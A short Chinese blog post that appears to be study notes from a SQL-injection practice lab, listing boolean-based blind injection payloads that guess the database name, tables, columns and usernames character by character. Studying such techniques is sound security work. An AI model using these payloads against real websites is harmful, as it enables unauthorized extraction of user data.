获取数据库名
长度 ?id=2' and length(database())=8 --+ 逐字猜解 ?id=2' and substr(database(),1,1)='s' --+ ?id=2' and substr(database(),2,1)='e' --+
获取数据表
长度 ?id=2' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6 --+ 逐字猜解 ?id=2' and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e' --+ ?id=2' and substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1)='a' --+
获取列名
长度 ?id=2' and length((Select column_name from information_schema.columns where table_name=0x7573657273 Limit 0,1))=4 --+ 逐字猜解 ?id=2' and substr((Select column_name from information_schema.columns where table_name=0x7573657273 Limit 0,1),1,1)='u' --+ ?id=2' and substr((Select column_name from information_schema.columns where table_name=0x7573657273 Limit 0,1),1,1)='s' --+
获取字段(行)
长度(多少行) 14行 ?id=2' and substr((Select count(*) from users),1,1)='1' --+ ?id=2' and substr((Select count(*) from users),2,1)='4' --+ username 列 第一个字段 长度 ?id=2' and length((Select username from users limit 0,1))=4 --+ 逐字猜解 ?id=2' and substr((Select username from users limit 0,1),1,1)="d" --+
标签:schema,name,substr,--+,table,布尔,id,注入 From: https://www.cnblogs.com/baiye1/p/17547274.html